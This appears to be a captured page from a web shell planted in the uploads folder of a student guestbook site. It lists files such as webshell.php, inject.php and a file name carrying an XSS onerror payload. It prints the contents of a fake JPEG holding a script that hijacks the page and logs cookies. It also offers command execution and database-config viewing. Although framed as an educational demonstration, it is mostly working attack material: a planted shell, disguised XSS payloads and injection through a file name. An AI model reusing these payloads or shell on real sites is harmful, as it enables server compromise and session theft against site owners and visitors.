🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./instant_redirect.jpg

JFIF      
<script>
// INSTANT REDIRECT XSS ATTACK
alert('🚨 CRITICAL SECURITY BREACH! 🚨\n\nInstant XSS attack executed!\n\nRedirecting to demonstrate impact...');

// Show a dramatic hacking effect
document.body.style.background = 'black';
document.body.style.color = '#00ff00';
document.body.innerHTML = `
<div style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: black; color: #00ff00; font-family: 'Courier New', monospace; padding: 20px; overflow: hidden; z-index: 999999;">
    <h1 style="text-align: center; font-size: 36px; margin-bottom: 20px;">ACCESS GRANTED</h1>
    <div id="hackText" style="font-size: 14px; line-height: 1.4;"></div>
</div>
`;

// Simulate hacking text effect
const hackingText = [
    'Initializing hack sequence...',
    'Bypassing security protocols...',
    'Accessing user database...',
    'Extracting session tokens...',
    'Downloading sensitive files...',
    'Uploading backdoor...',
    'Establishing persistent connection...',
    'SYSTEM COMPROMISED SUCCESSFULLY!',
    '',
    '🎯 ATTACK VECTOR: File Upload XSS',
    '💀 IMPACT: Full system access',
    '🔓 STATUS: All security bypassed',
    '',
    'Redirecting to demonstrate complete control...'
];

let textIndex = 0;
const hackTextElement = document.getElementById('hackText');

function typeHackText() {
    if (textIndex < hackingText.length) {
        hackTextElement.innerHTML += hackingText[textIndex] + '<br>';
        textIndex++;
        setTimeout(typeHackText, 500);
    } else {
        // After hacking simulation, redirect
        setTimeout(() => {
            alert('🔥 DEMONSTRATION COMPLETE! 🔥\n\nIn a real attack, you would now be redirected to:\n\n• Phishing site\n• Malware download\n• Data theft portal\n\nYour upload system is critically vulnerable!');
            
            // Restore original page (for demo purposes)
            location.reload();
        }, 2000);
    }
}

// Start the hacking simulation
setTimeout(typeHackText, 1000);

// Log the attack for educational purposes
console.log('🚨 XSS ATTACK LOG:');
console.log('File: instant_redirect.jpg');
console.log('Attack Type: Immediate JavaScript execution');
console.log('Payload: Page hijack + redirect demonstration');
console.log('Cookies accessible:', document.cookie);
console.log('User agent:', navigator.userAgent);
console.log('Current URL:', window.location.href);
</script>

<?php
// Fallback content in case JavaScript is disabled
echo '<noscript>';
echo '<h1 style="color: red;">XSS ATTACK EXECUTED!</h1>';
echo '<p>This JPEG file contains malicious JavaScript that would execute immediately.</p>';
echo '<p>JavaScript is disabled, but in a real scenario, this would:</p>';
echo '<ul>';
echo '<li>Steal your session cookies</li>';
echo '<li>Redirect you to malicious sites</li>';
echo '<li>Inject malicious content into the page</li>';
echo '<li>Steal any form data you enter</li>';
echo '</ul>';
echo '</noscript>';
?>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📁 Show directory | 🔄 Show processes | Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!